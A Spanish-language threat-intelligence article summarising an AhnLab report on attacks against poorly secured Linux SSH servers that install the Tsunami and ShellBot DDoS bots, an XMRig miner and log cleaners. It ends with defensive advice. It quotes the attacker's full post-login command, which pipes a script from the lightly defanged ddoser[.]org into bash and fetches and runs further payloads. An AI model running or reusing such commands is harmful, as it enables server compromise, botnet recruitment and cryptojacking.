AhnLab Security Emergency Response Center (ASEC) descubrió recientemente una campaña que consiste en la instalación de Tsunami DDoS Bot en servidores Linux SSH administrados de manera inadecuada. El actor de amenazas no solo instaló Tsunami, sino que también instaló varios otros programas maliciosos como ShellBot, XMRig CoinMiner y Log Cleaner.
Al observar los casos de ataque contra servidores Linux SSH mal administrados, la mayoría de ellos involucran la instalación de bots DDoS o CoinMiners. El bot DDoS se ha cubierto aquí en el blog de ASEC antes a través de los casos de ataque donde se instalaron ShellBot y ChinaZ DDoS Bot. La instalación de XMRig CoinMiner se cubrió junto con el malware SHC y la campaña de ataque KONO DIO DA
Tsunami es un bot DDoS que también se conoce como Kaiten. Es una de las varias cepas de malware que se han distribuido constantemente junto con Mirai y Gafgyt cuando se dirigen a dispositivos IoT que generalmente son vulnerables. Si bien todos comparten el terreno común de ser bots DDoS, Tsunami se destaca de los demás en que opera como un bot IRC, utilizando IRC para comunicarse con el actor de amenazas.
Funcionalidades
ASEC observó que los intrusos también generaron un nuevo par de claves SSH públicas y privadas para que el servidor violado mantuviera el acceso incluso si se cambiaba la contraseña del usuario.
El malware descargado en hosts comprometidos incluye botnets DDoS, limpiadores de registros, mineros de criptomonedas y herramientas de escalamiento de privilegios.
Comenzando con ShellBot, este bot DDoS basado en Perl utiliza el protocolo IRC para la comunicación. Admite escaneo de puertos, UDP, TCP y ataques de inundación HTTP y también puede configurar un shell inverso. El otro malware de botnet DDoS visto en estos ataques es Tsunami, que también utiliza el protocolo IRC para la comunicación.
La versión particular vista por ASEC es "Ziggy", una variante de Kaiten. Tsunami persiste entre reinicios al escribirse en "/etc/rc.local" y usa nombres de procesos de sistema típicos para ocultarse.
Código fuente
El código fuente de Tsunami está disponible públicamente, por lo que es utilizado por una multitud de actores de amenazas. Entre sus diversos usos, se utiliza mayoritariamente en ataques contra dispositivos IoT. Por supuesto, también se usa constantemente para apuntar a servidores Linux. Además, similar al caso en el que XMRig CoinMiner se distribuyó a un contenedor Docker público con Tsunami, se confirmó otro caso en el que también se distribuyeron a un entorno de nube. Además, la inclusión de malware dentro de contenedores Docker distribuidos no oficialmente es uno de sus principales vectores de ataque.
1. Ataque de diccionario contra servidores Linux SSH
Si se utilizan credenciales de cuenta simples (ID/PW) en un sistema Linux, un actor de amenazas puede iniciar sesión en el sistema a través de la fuerza bruta o un ataque de diccionario, lo que le permite ejecutar comandos maliciosos.
2. Flujo de ataque
Después de iniciar sesión con éxito, el actor de amenazas ejecuta un comando como el siguiente para descargar y ejecutar varios programas maliciosos.
# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a |
grep glo;uname -a;cd /tmp;wget -O – ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;
./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;
tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
Entre el malware que se instala, el archivo "key"
es un
Script Bash que instala otros malware adicionales. Además de ser un
descargador, también realiza varias tareas preliminares para controlar los
sistemas infectados, lo que incluye la instalación de una cuenta SSH de puerta
trasera.
Análisis de malware Tsunami
Como el malware de bot DDoS también conocido como Kaiten, Tsunami es utilizado por varios actores de amenazas ya que su código fuente está disponible públicamente. Los actores de amenazas a menudo modifican el código fuente del Kaiten existente para agregar más funciones, y el Tsunami utilizado en este ataque es una variante de Kaiten llamada Ziggy. Al comparar las explicaciones que se muestran en el comando de ayuda real, son idénticas al código fuente.
Esta publicación de Ahnlab cubrirá un caso en el que un actor de amenazas logró iniciar sesión en servidores SSH mal administrados después de realizar ataques de diccionario, lo que luego fue seguido por la instalación de DDoS Bots y XMRig CoinMiner.
Además de los ataques DDoS SYN, ACK, UDP y de inundación aleatoria, Tsunami también admite un amplio conjunto de comandos de control remoto, incluida la ejecución de comandos de shell, shells inversos, recopilación de información del sistema, actualización y descarga de cargas útiles adicionales desde una fuente externa.
Log Cleaner
Luego están MIG Logcleaner v2.0 y Shadow Log Cleaner, ambas herramientas utilizadas para borrar la evidencia de intrusión en computadoras comprometidas, lo que hace que sea menos probable que las víctimas se den cuenta de la infección rápidamente.
Estas herramientas admiten argumentos de comando específicos que permiten a los operadores eliminar registros, modificar registros existentes o agregar nuevos registros al sistema.
Escalamiento de privilegios
El malware de escalamiento de privilegios utilizado en estos ataques es un archivo ELF (formato ejecutable de Linux) que eleva los privilegios del atacante a los de un usuario root.
Finalmente, los actores de amenazas activan un minero de monedas XMRig para secuestrar los recursos computacionales del servidor para extraer Monero en un grupo específico.
Para defenderse de estos ataques, los usuarios de Linux deben usar contraseñas de cuenta seguras o, para mayor seguridad, requerir claves SSH para iniciar sesión en el servidor SSH.
Además, se debe deshabilitar el inicio de sesión root a través de SSH, limitar el rango de direcciones IP permitidas para acceder al servidor y cambiar el puerto SSH predeterminado a algo atípico que los bots automatizados y los scripts de infección no conocen.